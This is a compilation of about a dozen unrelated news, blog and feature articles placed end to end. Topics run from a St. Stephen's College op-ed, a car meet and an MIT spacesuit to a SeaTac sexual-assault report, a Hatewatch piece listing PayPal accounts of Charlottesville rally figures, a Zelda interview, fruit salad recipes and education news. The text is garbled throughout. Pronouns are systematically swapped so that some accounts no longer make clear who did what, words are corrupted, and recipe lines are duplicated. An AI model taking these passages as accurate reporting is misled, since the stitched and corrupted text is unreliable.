Fact: Every student at St. Stephen's is part of India's elite. While there is a reservation system for the admission of scheduled castes and others residing at the bottom of India's socioeconomic pyramid, once every student at St. Stephen's enrolls they become a member of the elite, irrespective of background. With that name stamped on their diploma, the world becomes easier because they are part of “the club.” For example, an idiot who graduates from Harvard and learned nothing probably has an easier chance of getting a great job than the genius from an unheard of college. Sad but mostly true. The same can be said with respect to the Ivy League, Oxford and Cambridge, and elite schools all over the world. It would be easy for St. Stephen's students to not challenge the system and continue to move down the conveyor belt because, relative to other schools, their actual education matters less; the name and reputation of the school relieves some of the weight that the student's intellect would otherwise have to carry.
The opposite side of this same coin, though, is the upside St. Stephen's students could reap. St. Stephen's students also have the most to gain from change. Because St. Stephen's College is such a great school, it can attract great names and create a great curriculum. Imagine if my teachers had actually taught their classes? Whoa. Instead of just the promise and illusion of an amazing liberal arts education, St. Stephen's students would get that education. If the end is knowledge, then St. Stephen's students win big.
We are entering a year of politics and elections. With elections comes the possibility of change. The most troubling line in the student's article was in reference to the “wielding of disproportionate power by the Principal,” which was: “Education in India awaits a rescue from the hands of such figures.”
Who, may I ask, do you hope to be your rescuers? Your representatives in government? Your parents? The characters from Rang De Basanti? There is a window available if only there existed the resolve and determination within India's students to seize it, which remains to be seen. One lesson that no college is very good at teaching: In life, you should not expect others to fight your battles for you. While higher education is a public good and has champions in the private and public world, students are the ultimate stakeholders. If the students at St. Stephen's College want to practice the potent words that they wrote in Kafila, then it is time to stand up and be counted. If not, the only people who suffer will be themselves.
A version of this article was originally published in Kafila.
This article is part of Quartz Ideas, our home for bold arguments and big thinkers.
H2Oi short for H2O International is described as the "Most Ticketed Car Event in America", probably the world. It started as a Volkswagen/Audi car show held not even in the area most refer to as Ocean City, but it causes herds of car enthusiasts to flow to the beach town. There are tons of after movies for each year on YouTube, but if I had to describe it, it is the late night car meet scene in the original Fast and Furious movie, at a beach, multiplied by 10. The VW/Audi event's name H2Oi usually gets misrepresented by the influx of tuner cars in Ocean City, but at this point they are one in the same. This year, it appears the influx of cars to Ocean City may out live the event, because for 2017 H2Oi has been postponed until 2018.
The decision to cancel postpone H2Oi came so late that many enthusiasts already reserved hotel rooms, condos, and houses which many times are non-refundable. Rumors are that Ocean City put pressure on the H2Oi organizers to cancel the show, but as I said the flock to the beach town has out grown the original reason for being there. Kill the show all you want, the people will still come. Attending enthusiasts began calling this year - H2No.
This was my first time attending H2Oi H2No. I was not even supposed to be in the town this week, but I had the opportunity to crash in a condo Wednesday to Friday, I had to leave Friday for a prior engagement. The main car enthusiast population is there from Friday to Sunday. So while I was not there on the big population days, I experienced the "prep days". I was mainly there to enjoy the beach, the boardwalk, and inconspicuously cruise Coastal Highway in my wife's Subaru Crosstrek. I have watched tons of after movies of the prior years, but none of that will prepare you for the environment you get yourself into.
Cruising around I think my most "how did that happen moment" was when I saw a Ocean City Bus T-boning a Volkswagen. I could not get a picture, but social media was on top of it.
Space travel is about to get a whole lot sexier! Researchers at MIT are working on a prototype for a skintight bodysuit that will help astronauts mitigate bone loss while outside earth's orbit. Made of elastic mesh, the suit applies pressure on the bones, much like what gravity does to landlubbers down here. But although the Gravity-loading Countermeasure Skinsuit (GLCS) is helping keeping astronauts' bodies healthy, it's also giving them a glammed-down Ziggy Stardust vibe—completely apropos considering that manned missions to Mars are on the horizon.
The original clunker
MAN OR ASTROMAN?
Managing bone density in space is a weighty issue. In space, astronauts lose about 1 to 2 percent of their bone mass in a month, the same amount a mail carriersopausal woman loses in a year. Spacefarers are currently exercising two hours daily to lessen bone loss, but the physical activity isn't enough. Scientists estimate that if we send humans to Mars, astronauts could experience bone fractures even with simple tasks. The body-hugging GLCS, which was developed at MIT's Man-Vehicle Laboratory, is designed to alleviate that problem.
The suit exerts pressure on the legs and shoulders, similar to what the weight of your body does on Earth.
The suit is sleeveless (apparently arm-bone mass isn't lost in…um…space), is cut short, and has stirrups that slip under the feet. It exerts a small amount of pressure on the legs and shoulders, similar to what the weight of your body does when you're standing under the influence of earth's gravity.
One caveat: The suit isn't meant to be worn while on space walks—a different suit, which squeezes the body like a fully inflated blood-pressure cuff, is used for jaunts outside a pressurized spaceship. In a spacecraft or on a space station, the GLCS keeps astronaut bones in line with a higher degree of comfort. They're only as tight as a pair of Lycra bike shorts, and probably make your legs look just as amazing.
+ Gravity-loading Countermeasure Skinsuit
[Via Discovery News]
Fallen by Lia Mills, a novel set against the backdrop of the events of the Easter Rising, has been chosen as the Dublin One City One Book choice for 2016.
The coming-of-age book tells the story of Katie Crilly, whose twin brother, Liam, is killed fighting with the Allies during the First World War. A year later when Dublin is suddenly engulfed by the Easter Rising, they find themselves torn between their loyalty to the cause their brother died for and their patriotism.
For the first time Dublin will team up with Belfast for Two Cities One Book Festival so that next April readers in Dublin and Belfast will engage with the same book at the same time.
Lia Mills , author of Fallen
Author Lia Mills said, “I'm delighted that Fallen has been chosen for the Dublin: One City One Book festival in 2016. The festival is such a positive boost, for books and for readers. I wanted this novel to explore a fresh perspective, starting with the question: what would it be like to find your city taken over by forces you don't recognise? The participation of Libraries NI adds a new and exciting dimension to the festival. I'm really looking forward to seeing what we can do."
The Dublin: One City One Book Festival, which encourages everyone to read a book connected with Dublin during the month of April, has been running since 2006. Previous novels selected include Sebastian Barry's A Long Long Way, James Plunkett's Strumpet City and Bram Stoker's Dracula.
Ain't no party like a bikini party — just ask
The Glee star has taken some time off from their hectic filming schedule to soak up the sun in Cabo San Lucas, and was seen flaunting their bikini bod. Lea's first suit was a girly pink, but they followed that up with this sexy navy one, and showed off their toned figure as well as some peek-a-boo tattoos.
While Lea had a little vacay before Glee‘s “winter finale” airs on FOX tonight, there are rumors flying that things are heating up with co-star Cory Monteith off-screen.
Life & Style is reporting that the two, who play New Direction's it couple “Finchel” on Glee, are dating in real life! Eyewitnesses tell the magazine that Lea and Cory had a very romantic Valentine's Day dinner in LA, saying:
“They were into each other all night. They were very happy, flirting and touching Cory a lot. They just stared at them with puppy-dog eyes.”
Lea split from their BF Theo Stockman back in September, but nothing is officially confirmed as to whether or not Lea and Cory are in fact an item. Check out some photos from when Lea and Theo were still together below.
Also, it looks like Lea is already back in LA and ready to get back to business!
Back in LA:) Had such an awesome trip! Feel so rested and ready for the work week ahead! — Lea Michele (@msleamichele) February 21, 2012
Quick trip, but it looks like they had fun!
Do you think Lea and Cory are really dating? Sounds off in the comments!
SEATAC, Wash. -- A man climbed through the open window of an 83-year-old woman's room at an assisted-living facility here, then beat and sexually assaulted them in the middle of the day, the King County Sheriff's Office says.
The attacker is at large.
"I'm really taken back by it, I just don't know what to say," said Andrew Zongus, a friend of the victim.
The crime was so brutal and brazen that it left law enforcement stunned.
"The nature of it, horrible, horrible circumstances," said Sgt. Jason Houck of the King County Sheriff's Office . “But an 83-year-old woman? That's just seeming like it's taking it to a new low.”
The Sheriff's Office says deputies went to the Falcon Ridge assisted-living facility in the 21200 block of International Boulevard just after 4:30 p.m. Thursday.
Firefighters told deputies the 83-year-old woman had serious head injuries and showed signs of sexual assault. They were taken to a hospital.
They told deputies later that they were in their room watching TV when they heard a noise by an open window. They saw a man taking off the screen and climbing through.
The man hit them several times on the side of the head, wrapped their hands around their throat and choked them Then they sexually assaulted them
Before they left, they made what the Sheriff's Office said were demands about what they could and couldn't do.
The fearful woman waited several minutes after the man climbed out of the window before screaming for help, the Sheriff's Office said.
Staff came to them and called 911.
Deputies arrived with a dog to try to track the attacker, but the man couldn't be found.
 They are described as a black man who is 5 feet 8 inches tall and has a slender but strong build. They were wearing a black and white shirt, black pants and a black skull cap.
An administrator of Falcon Ridge said the facility is working closely with law enforcement.
If you can help investigators, call the Sheriff's Office at 296-3311. You can remain anonymous.
"I know nothing would make a deputy's day more than to find somebody like this and figure out who did this," Houck said.
UPDATE: In a statement on August 15, PayPal re-stated its commitment to enforcing its Acceptable Use Policy (AUP) and dropped many of the accounts Hatewatch reported on below.
The chaotic events of the day were quickly declared an unlawful assembly and, eventually, a state of emergency. The slated speakers never made it to the stage.
The event demonstrated an unprecedented level of planning and coordination among organized hate groups from across the far-right ideological spectrum. Representatives from groups often at odds with one another such as Vanguard America, Identity Evropa, League of the South, Traditionalist Worker Party, National Socialist Movement, and more gathered at Emancipation Park (formerly Lee Park) to protest the planned removal of a statue of Robert E. Lee.
PayPal, one of the world's largest online payment processors, was integral in raising money to orchestrate the event. Organizers, speakers, and individual attendees relied on the platform to move funds in the run up to the ultimately deadly event.
Despite the company's Acceptable Use Policy explicitly banning “the promotion of hate, violence, [and] racial intolerance,” the following organizers and attendees were allowed to utilize PayPal's surface before and after the events in Charlottesville.
Jason Kessler
Jason Kessler organized the Charlottesville Unite the Right protest on the heels of a previous organized march and torchlit rally that garnered media attention after images emerged of white nationalists surrounding a statue of Robert E. Lee in Emancipation Park.
Although Kessler did not plan “Charlottesville 1.0,” they saw the event as the perfect opportunity to gain widespread attention for their one-man crusade against Charlottesville's Vice-Mayor Wes Bellamy, who Kessler has decried as a “black racist.”
Kessler was central in the organization and coordination of the rally. After securing a permit for the event, Kessler attended several demonstrations in Charlottesville including one that resulted in their arrest for failure to obey an officer's commands. Kessler made the rounds on numerous far-right podcasts in order to hype their unity rally and to coordinate what would become the largest far-right gathering in over a decade.
Kessler utilized their PayPal, jason@unityandsecurity.org to secure funds for the event, including a planned after-party that was canceled when the venue was tipped off to the nature of the event. Refunds for that are scheduled to be made available through an account under the email address, CVilleRefunds@gmail.com.
Richard Spencer
Richard Spencer is one of the most public and prominent members of the racist Alt-Right, perhaps known best for their “exuberant” toast at last year's National Policy Institute (NPI) gathering that resulted in stiff-armed salutes and an eruption of “Sieg Heils.”
Spencer operates a network of far-right publications, websites, and “think tanks” including NPI, AltRight.com — founded after they abdicated their role as editor of Radix Journal, a white nationalist blog — and the HL Mencken club, which Spencer was heavily involved in from its inception in 2008.
Spencer's role in Charlottesville 1.0 generated immense press attention and controversy and was crucial in galvanizing support from the far-right for the second, deadly rally, where Spencer was given top-billing among its list of speakers.
They collect donations on PayPal with accounts tied to the National Policy Institute and AltRight.com.
Identity Evropa
Nathan Damigo founded Identity Evropa in 2016. The group focuses its activism on college campuses including its signature campaign, “Operation Siege.” Known primarily for plastering white nationalist flyers and stickers on campuses and later publicizing their actions on social media, IE members were among the most visible in Charlottesville.
Damigo has become one of the most recognizable faces of the Alt-Right, frequently appearing alongside Richard Spencer — including in Spencer's Monday press conference about the events that unfolded in Charlottesville. Their profile rose significantly on the right after images surfaced of them punching a 95-pound antifa protester in the face during a rally in Berkeley, California, last April.
They were arrested during the Charlottesville event for refusing to vacate Emancipation Park following Virginia State Police declaring the assembly unlawful.
Identity Evropa collects PayPal donations with an account named Identity Evropa, Inc.
League of the South
The League of the South (LOS) is a militant secessionist neo-Confederate organization that has shifted from its 1994 founding as a soft engine of Lost Cause apologia started by a group of fringe academics to a virulently racist group intent on bringing about a second Civil War by capitalizing on racial strife in America.
Founder Michael Hill was slated to speak at to Unite the Right rally. Although they were unable to take the stage due to the state of emergency declared after fights broke out at Emancipation Park, Hill still found a platform for their views by leading the LOS's “Southern Defense Force” through crowds of counter-protesters, brawling with anyone they encountered.
Members of the League were filmed punching a woman and dragging them rearward into their ranks to be set upon by multiple men and viciously beating a black man with sticks in a nearby parking garage.
Although the LOS was previously banned from PayPal, founder and president Michael Hill has circumvented this through the use of their own PayPal account, james.hill120651.
Michael Tubbs, the League's chief of staff and Florida chairperson, was among those filmed during the parking garage beating. Their chapter collects funds through the account neflos@net-host.net.
Christopher Cantwell
Christopher Cantwell is the host of Radical Agenda, a podcast the far-right libertarian-turned-fascist hosts from their home-state of New Hampshire.
Cantwell has described their views as something they developed “between blackouts,” an amusing anecdote which belies the harsh escalation of racist rhetoric that Cantwell has exhibited after being removed from platform after platform for their increasingly caustic diatribes against blacks, jews, and “non-white immigrants.”
Cantwell has frequently advocated for violence on their show and exhibited a temperament that can only be described as volatile. Thus it came as no surprise when on Friday, August 11, the day before Unite the Right began, Cantwell was among those involved in a parking lot dispute at a Charlottesville-area WalMart where someone is reported to have pulled a gun.
Photography from the rally featured numerous shots of Cantwell brawling with counter-protesters. One now-infamous photograph shows Cantwell spraying a man in the face with pepper spray during a confrontation.
Cantwell collects donations for Radical Agenda through the PayPal account Doitallconsulting.com.
Augustus Invictus
August Invictus (Austin Gillespie), a listed headliner at Unite The Right, has become a fixture on the Alt-Right speaking circuit. The former candidate for senate for the Florida Libertarian Party is best known for their botched slaughter of a goat and subsequently drinking its blood.
Invictus dabbles in academic racism, frequently referencing the intellectual inferiority of black people; violent misogyny; and anti-Muslim conspiracy theories, such as the existence of “no-go zones,” the widespread implementation of sharia law, and that there are roving gangs of Muslims attacking and raping white people. They have also refused to acknowledge that the Holocaust took place.
 They are currently the Sergeant at Arms for the American Guard and second in command of the Fraternal Order of Alt-Knights, the most violent faction of Gavin McInnes's Proud Boys.
Their writings live at The Revolutionary Conservative where they collect PayPal donations under the email address, revcononline@gmail.com.
The Right Stuff
The Right Stuff (TRS) is a virulently anti-Semitic and racist website founded by Mike Peinovich in 2012 that hosts many of the Alt-Right's most popular podcasts. It's flagship program, The Daily Shoah, is one of the most influential programs on the far-right and one of the primary information distribution points for organized racism. Peinovich was a headliner at to Unite the Right event.
Among the site's audience are the “TRS Confederates,” a group of TRS listeners and posters from southern states who set up their own affiliated website and podcast network, “Identity Dixie” as a PR maneuver in the wake of Peinovich's doxing.
Having learned from Peinovich's example, the hosts of many of the TRS affiliated podcasts attempt to avoid doxing by using pseudonyms, such as Musonius Rufus and Silas Reynolds of Identity Dixie.
Another TRS-offshoot network, Alternative Right Coalition (ARC) Media, features podcasts like “Salting the Earth,” hosted by the pseudonymous Caerulus Rex, a Charlottesville organizer. Rex solicits funds through the PayPal account caerulus.rex@gmail.com.
Among the organizers of IdentityDixie's first real-life meeting are Michael Cushman, a former National Alliance member, and Brad Griffin, of Occidental Dissent.
The TRS Confederates's flagship blog, “Rebel Yell” — described as a “southern nationalist podcast of the Alt-Right” — hosted Jason Kessler, Unite The Right's organizer, on a segment of their show, and hosts podcasts by Kentucky LOS chairperson Spencer Borum, who was seen viciously assaulting a woman during the rally.
Other podcasts on the site espouse far-right sentiments while promoting racist content from across the fringes of the far-right blogspace.
Individuals bearing a variant of the neo-Confederate “Southern Nationalist” flag emblazoned with Identity Dixie's logo, a white magnolia flower, were present among members of the Nationalist Front, a coterie of far-right groups responsible for some of the most heinous violence in Charlottesville this weekend.
The TRS Confederates collect donations with a PayPal account linked to the email address, trsconfed@gmail.com.
Patriotic Flags
Patriotic Flags is an online merchandise retailer run by Kyle Rogers, a past-member of the LOS and the former web-master of the Council of Conservative Citizens (CofCC), a group cited by Dylann Roof as instrumental in their radicalization in a web-manifesto.
Rogers sells a variety of far-right flags and banners, including the neo-Confederate “Southern Nationalist” flag, the flag of Rhodesia — which Roof wore on their jacket in a widely circulated photograph — and various Confederate flags. The site features a photograph of Matthew Heimbach, one of the principle organizers and planned speakers at to Unite the Right rally, as its product illustration for one shirt.
Various other flags on display at Unite the Right are available on Rogers' website.
Rogers is also apparently one of the primary vendors for sale of the official League of the South uniform shirt, a black polo emblazoned with the “Southern Nationalist” flag, which many members can be seen wearing in footage from the Charlottesville rally. Many LOS members plugged Rogers' website in discussions about “building kit” for the rally.
Rogers themselves bragged about purchasing three riot shields in the runup to the event and can be seen in footage from the rally.
Patriotic Flags uses PayPal as its primary payment processing platform.
Eiji Aonuma has presided over the The Legend of Zelda series for the past 15 years and has overseen some of the franchise's most iconic entries. We got the chance to sit down and speak with them during this year's E3 event, where they were promoting the two forthcoming instalments: The Legend of Zelda: Wind Waker HD and The Legend of Zelda: A Link Between Worlds.
Nintendo Life: It was known at the time that some dungeons were removed from the original version of Wind Waker because the game wouldn't have been completed in time. Will any of those removed dungeons be reinstated?
Aonuma: I've received many questions about additional content beyond what was in the GameCube version of the game, but our desire is to stay true of the story that was in the original. If we add dungeons then that will affect other parts of the GameCube version, which we really want to stay true to.
If it felt like there were maybe too few dungeons then I feel that what was wrong with the GameCube version was the pacing. It was thrown off because it took longer to get to certain dungeons. There was a waiting period, and then when you arrived there the experience maybe didn't feel as big as you'd waited so long to get there. We're tuning the game to alleviate all that. The pacing should feel appropriate to the overall experience this time.
And, quite honestly, those dungeons we removed we used in other games so we can't use them in this version!
NL: Can you tell me which dungeons they were?
Aonuma: I can't! [laughs]
Subscribe to Nintendo Life on
NL: Moving on to A Link Between Worlds - there haven't been very many direct Zelda sequels. What made you want to revisit A Link to the Past?
Aonuma: The thought was that we wanted to make a top-view Zelda with the concept that every once in a while Link would enter the wall, and only at that time would it become a 3D experience.
We figured that if we used this Link to the Past world, this architecture and structure in place, we could create it even more quickly. There's also a lot more to explore in that environment, so we felt that world would be a great starting point. So if we say it's a sequel to Link to the Past it's easier for players to understand where we're coming from and our starting point for this story. It also felt like that story was really well suited for a sequel.
NL: During that Nintendo Direct you hinted that we may no longer play Zelda alone on Wii U. Do you think local or online multiplayer would be better for the series?
Aonuma: In saying it's not a single-player or lone experience, I didn't necessarily mean multiplayer. There has actually been multiplayer in Zelda games, in Four Swords for example. But for example in Wind Waker, with the Tingle Bottle - it's not a traditional multiplayer experience but you certainly have the feeling that other people are exploring the same world and sharing information.
So that's one way that I meant that it's not a single-player experience. We'll continue to explore different ways of opening up this world beyond a single-player experience, but that's not necessarily to say that there will be typical multiplayer.
Subscribe to Nintendo Life on
NL: Regarding the control scheme for the untitled Wii U Zelda, will the focus be on the GamePad or the immersive motion controls that we saw in Skyward Sword and Twilight Princess?
Aonuma: I can't answer that. [Laughs]
NL: Would you ever consider DLC or add-on content for the Zelda series, or do you prefer games to be delivered whole?
Aonuma: We're certainly looking at different ways to add on content that would enhance the experience for the user - maybe more places to explore or just to enrich the experience beyond what is on the disc. But we also have to take into consideration that if we charge for this content then it needs to be worth it for the user.
So it's certainly a balancing an act, but I can't say that it is something we're not considering.
NL: The Zelda series tells the story of a male hero rescuing a female princess. Would you ever consider giving Zelda their own game?
Aonuma: This is the second time I've received this question during this E3! I guess if people have strong feelings about it then it's something to consider. I'll keep that in mind! [laughs]
NL: Handheld Zelda games are traditionally top-down, with the exception of the 3DS version of Ocarina of Time. Is that a stylistic choice or about the limitations of the handheld platform?
Aonuma: The answer is actually very simple. In home console games you are usually looking up, and looking at things from this perspective. From handhelds you usually look top down, so that's the way that worlds are represented. But, now you mention it, maybe I'm looking at things too simply!
NL: Has the Virtual Console and its ability to introduce older titles to younger players influenced your decision to make a Link to the Past sequel?
Aonuma: Thankfully, Link to the Past is doing very well on Virtual Console, but that did not influence my decision to make a sequel. The reasons why we did this are the ones we explained earlier.
NL: Fans have often said that they'd like to see a 3D remake of Majora's Mask, just as there was one of Ocarina of Time. There were rumours that it was a possibility - is that still the case, or are you focusing on new games from now on?
Aonuma: You've heard rumours? [laughs] Hmm, I wonder! [laughs again]
NL: I would be very excited myself, it's one of my favourites of the series.
Aonuma: Majora's Mask is a very special game - it's the real hardcore who like that one. If we were to make a remake of that one then we wouldn't want to let them down. We'd have to put our heart and soul into it. So, you say you've heard rumours, but I have to say it would be quite a commitment to do that.
NL: The Zelda series has mostly maintained cartoon-like visuals, and even slightly more realistic games still have a fantastical look. Will the next Wii U Zelda game maintain this, or go for a more realistic look?
Aonuma: The thing about Zelda is we want everything to be unique, whether it's the graphical presentation or the gameplay. It has to be something you can't see anywhere else. We wouldn't want it to be ultra-realistic because you can see that elsewhere. But I can't say that it's going to be cartoony-realistic like you mentioned, the fantastic presentation that we've already done in the past. It will be something new.
NL: The storytelling tone changes from one Zelda game to another - some are quite playful, others are more emotive. What is the storytelling approach on the new 3DS and Wii U games?
Aonuma: This also is the unique thing we're always looking for. What we want to do is - you know you're going along and you think you know what's happening, then we turn everything on its head and everything goes nuts.
In Twilight Princess you have the dark world, in Majora's Mask you have that strange world - we're not hitting in any particular direction. It's whatever direction suits that particular story and what we're trying to achieve.
NL: Have you ever considered a sharply different theme for a Zelda world, such as setting it in a completely different era?
Aonuma: I don't know if we are joking when we do this or not, but there are times when I'll discuss with Mr. Miyamoto about putting Link and Zelda in the modern day world. What types of gameplay would there be? What changes would there be in the presentation of the story? But I honestly can't imagine them there.
It's not that we place them in any specific time period or in any specific culture. If you look at what happens in Zelda games there's a mix of Japanese and what might be considered Western things. It also allows us a lot of flexibility if you don't define a specific time period or location for the story to take place in. I don't see us making any drastic changes, unless it really suits the story.
This interview was conducted on behalf of Nintendo Life by Eurogamer's Oli Welsh. Be sure to check out Eurogamer's interview with Aonuma, where you'll find lots of additional content.
marc koehler embeds dune house into the topographic landscape
marc koehler architects embeds dune house into the topographic landscape
photography by filip dujardin
nestled on a landscape of sandy dunes on a northern dutch island, marc koehler architects has created the ‘dune house' which draws its influence directly from its topographic setting. dictated by the movement and views from walking around the environment, the form of the structure and the internal arrangement has been derived from this experience. the minimalistic and geometric nature of the timber-cladded exterior offers a multiplicity of sights from intimate and submerged views of the sand dunes to out and over the sea. using innovative ecological materials, eco-friendly installations and coupled with its unique wooden cross-laminated structure and bio-fuel central heating system, the residence is highly energy efficient with a low carbon footprint.
the exterior shows unique a wooden cross-laminated structure
image © filip dujardin
internally, the spatial strategy wraps around a distinctive, winding staircase placed at the home's core and is integrated with each room- serving as a fireplace, storage, and display as it transitions up through the house. each area is simultaneously connected to each other through various split-levels and the bedrooms are located underground, and the communal, relaxing areas placed on the upper floors. a careful relationship has been established between inside and outside, illustrated in the comfortable niches merged with the various sloped skylights. highlighted by a rich palette of light and dark materials, the residence blends its scenic environment with a minimal aesthetic- making it a restful and contemporary living space.
the unusual form is influenced by the sand dune mounds
image © filip dujardin
the staircase located in the core, integrates with the function of the spaces
image © filip dujardin
areas for relaxing
image © filip dujardin
image © filip dujardin
the large double-height windows softly illuminated the interiors
image © filip dujardin
dramatic sloped façade enables unparalleled views over and across the sea
image © filip dujardin
I always say fruit is nature's candy. There's no need to eat a bunch of refined sugar when you have plenty of natural and wholesome sweet treats to indulge in. Some of you may still be coming down off of an Easter sugar high this week, and that's totally okay! But it's time to get back on track, and eating fruit is a great way to get your palette accustomed to whole foods again.
Even when eating fruit, it's easy to get stuck in a rut. There are times when I myself have to go back and make sure I'm eating a variety of fruits to ensure adequate vitamin, mineral, and antioxidant consumption. Fruit salad is one of the best ways to incorporate many of the sweet and delectable fruits that are in season this time of year. That's why I've taken the time to provide some awesome fruit salad recipes you can enjoy any time of day. Whether you're rushed for breakfast in the morning or need a snack during the day for a boost of energy, these innovative fruit salad recipes will have you feeling satiated and healthy.
13 Easy and Healthy Fruit Salad Recipes
Fruit salad recipes don't need to be boring and use the same fruits over and over again. Try any of these fruit salad recipes for breakfast, a snack, or even dessert!
Mix 1 1/2 cups sliced strawberries, 1/2 cup raspberries, 2 tablespoons raw walnuts, and 2 tablespoons raw cacao nibs for a omega-3 rich take on dessert.
for a omega-3 rich take on dessert. Get your fiesta on with 1/2 cup mango cubes, 1/2 cup pineapple chunks, 1/4 cup raw grated carrots, 2 tablespoons raw goji berries, and a squeeze of fresh lime juice.
Celebrate summer with 1/2 cup blueberries, 1/2 cup blackberries, and 1/2 cup of sliced strawberries. Add a dollop of homemade whipped cream f or an extra treat.
Add a dollop of or an extra treat. Roll 1 cup of fresh cherries in 2 tablespoons of raw oats . Top with 1 tablespoon raw shredded coconut for a refreshing fruit salad with a hint of texture.
. Top with for a refreshing fruit salad with a hint of texture. Chop 1 fuji apple and toss with 1/4 cup grated carrots, 2 tablespoons raisins, 2 tablespoons sliced almonds and a squeeze of fresh lemon.
Go tropical with 1 cup chopped papaya, 1 cup cubed dragon fruit, 1/4 cup of fresh blueberries, and a hint of fresh orange juice.
Combine one sliced banana with 1 cups sliced strawberries and 2 tablespoons of raw cashews for a deconstructed strawberry, banana, cashew butter smoothie.
for a deconstructed strawberry, banana, cashew butter smoothie. Dice one Bartlett pear and mix with 1 tablespoon raw pecans. Sprinkle with 1 tablespoon Gorgonzola cheese for a play on sweet and savory.
for a play on sweet and savory. Mix 1 cup of cantaloupe with 1/2 cup of frozen blackberries that have slightly thawed . The extra juice will make an extremely flavorful sauce for a super scrumptious fruit salad recipe.
. The extra juice will make an extremely flavorful sauce for a super scrumptious fruit salad recipe. Mix 1 cup of strawberries, 1/2 cup of red or green seedless grapes, and 1/2 cup of blueberries for a fruit salad that's in season year round.
for a fruit salad that's in season year round. Chop one peach and mix with 1/2 cup fresh raspberries. Sprinkle with 2 tablespoons chopped raw hazelnuts and a sprinkling of cinnamon to bring out the flavor of the ripe and juicy peaches.
to bring out the flavor of the ripe and juicy peaches. Peel 1 navel orange, leaving some of the pith on the fruit for added fiber. Combine with 2 tablespoons dried cranberries and 2 tablespoons of shelled pistachios for a colorful and appetizing play on a citrus fruit salad.
for a colorful and appetizing play on a citrus fruit salad. Cut up 1 cup of fresh watermelon junks and mix with 1 cup of fresh pineapple chunks. Sprinkle with 2 tablespoons of of fresh or dried mint and a sprinkling of Feta cheese for a sweeter rendition of a shepherd's salad.
Other Tips for Fruit Salad Recipes
Make it ahead of time! No one has time in the morning to chop fruits, nuts, and other fun ingredients. Double or even triple any of these fruit salad recipes to have fruit salad for the whole week!
Add citrus to prolong your fruit salad's life span. Fruit salad will go bad over time, but adding a little citrus like some lemon or lime juice will help keep it fresher longer. It also adds a tart and flavorful note!
Buy fruit's that are in season. Not only will they taste better, but they'll cost less. Find out which fruits are in season here.
What are some of your fruit salad recipes? Comment below and let WTAF know!
The Mizzou International Composers Festival (MICF) will celebrate its fifth year in 2014, and composers Beat Furrer and Nico Muhly will be among those attending the party. Furrer and Muhly have been named guest composers for the Mizzou New Music Initiative's signature event, which will be held Monday, July 21 through Saturday, July 26 on the campus of the University of Missouri in Columbia.
The 2014 MICF once again will present a series of public concerts featuring music from contemporary composers, as well as workshops, master classes and other events. As in years past, Saturday night's grand finale at the Missouri Theatre will present the world premieres of new works from each of the festival's eight resident composers. The acclaimed new music group Alarm Will Sound, conducted by artistic director Alan Pierson, will serve as resident ensemble.
Beat Furrer is a Swiss native who studied music in their home country and in Vienna before co-founding one of Europe's leading contemporary music ensembles, Klangforum Wien, which they still conduct. They have written a variety of critically acclaimed works, including operas and musical theater, and has received numerous awards and honors for their music in Europe.
Since 1991, Furrer has served as professor of composition at the Graz University of Music and Dramatic Arts, and they have been guest professor in composition at the Hochschule für Musik und Darstellende Kunst in Frankfurt since 2006. In 2004 Furrer was awarded the Music Prize of the City of Vienna, and in 2005 became a member of the Academy of Arts in Berlin.
Nico Muhly was born in Vermont and earned a master's in composition at Juilliard studying with Christopher Rouse and John Corigliano. They also worked for Philip Glass as a MIDI programmer and editor for six years.
Muhly has composed a wide scope of work for ensembles, soloists and organizations including the American Symphony Orchestra, Boston Pops, Carnegie Hall, Chicago Symphony, countertenor Iestyn Davies, violinist Hilary Hahn, choreographer Benjamin Millepied, New York City Ballet, New York Philharmonic, Paris Opéra Ballet, soprano Jessica Rivera, and designer/illustrator Maira Kalman.
With the 2014 guest composers confirmed, eight resident composers now will be selected for the Festival through a portfolio application process to create a new work for Alarm Will Sound. During the Festival, they'll get composition lessons from Furrer and Muhly and take part in rehearsals with Alarm Will Sound. Each composer also will receive a copy of a professional live recording of their work.
The application process for resident composers begins September 26, 2013, and the deadline for submitting an application is Friday, November 15, 2013. For more information on applying to become a resident composer for the Mizzou International Composers Festival, please visit http://composersfestival.missouri.edu/application.html.
A complete schedule of events, times, dates and venues for the 2014 Mizzou International Composers Festival will be made available at a later date. For more information, please visit http://composersfestival.missouri.edu/.
National Numeracy group says education minister's proposals have too much rote learning and are short on real-life context
Michael Gove's proposed reforms of the maths curriculum put too much emphasis on "rote learning" and not enough on using maths in real-life contexts, according to a campaign group set up to improve numeracy.
The proposed new curriculum contains "serious flaws" that will undermine attempts to raise standards, according to the charity National Numeracy.
The pressure group says the curriculum was overloaded, and that the aspects of maths children should learn in primary school were set out in an "atomised" way that does not explain the links between them.
In a letter to the education secretary, the campaign group says the draft proposals will not allow children to develop genuine mathematical understanding. It urges the government to reduce the maths curriculum to an essential core. The intervention comes ahead of this week's A-level results, which will once again highlight the proportion of children opting to study maths and science beyond the compulsory age.
The proposals include recommendations for primary-age children to learn their times tables up to 12 x 12 and read years written in Roman numerals.
Chris Humphries, chair of National Numeracy and a former chief executive of the UK Commission for Employment and Skills, said: "We know how vital it is to build a numerate population – and how the UK is currently failing. The government now has the opportunity to put in place a new approach to the school curriculum which will develop the real knowledge and understanding that children need – for further education, work and life."
The criticism echoes an attack on Gove's curriculum reforms by Andrew Pollard, one of the expert panel involved in drawing up the changes, who said the highly detailed specifications for English, maths and science risked wrecking "breadth, balance and quality" in children's school life.
The draft proposals say that five- and six-year-olds will be expected to count up to 100, as well as recognising basic fractions and common shapes.
In year two, children will be required to know the two, five and 10 times tables, as well as constructing and interpreting simple graphs.
At the age of nine children should know their times tables up to 12 x 12, the proposals say.
Pupils in year three should be able to read the Roman numerals on a clock, while by year five they should read Roman numerals up to 1,000 and also be able to decipher years written in Roman form.
A Department for Education spokesperson said the plans would put England's maths curriculum "on a par with the best in the world".
The spokesperson said: "It is high time rigour was restored – children must know their times tables up to 12 off by heart, know how to multiply and divide fractions, and have good mental arithmetic. A solid grounding in the basics means children can then move on to more complex maths concepts. The new curriculum will drive up standards for all children."
A government study has shown that a growing number of adults have poor maths skills. Researchers commissioned by the Department for Business, Innovation and Skills gave tests in basic numeracy and literacy to more than 7,200 adults.
The results showed that 24% had the number skills of a child aged nine or younger. The study also found that 15% of adults had the literacy skills of a child aged 11 or younger.
Cody Grimes Special to The Register Cody Grimes (Photo: Special to The Register)
A Des Moines police officer fired in June will return to street patrol in the coming weeks.
As expected, the Des Moines Civil Service Commission on Tuesday overturned Senior Officer Cody Grimes' termination.
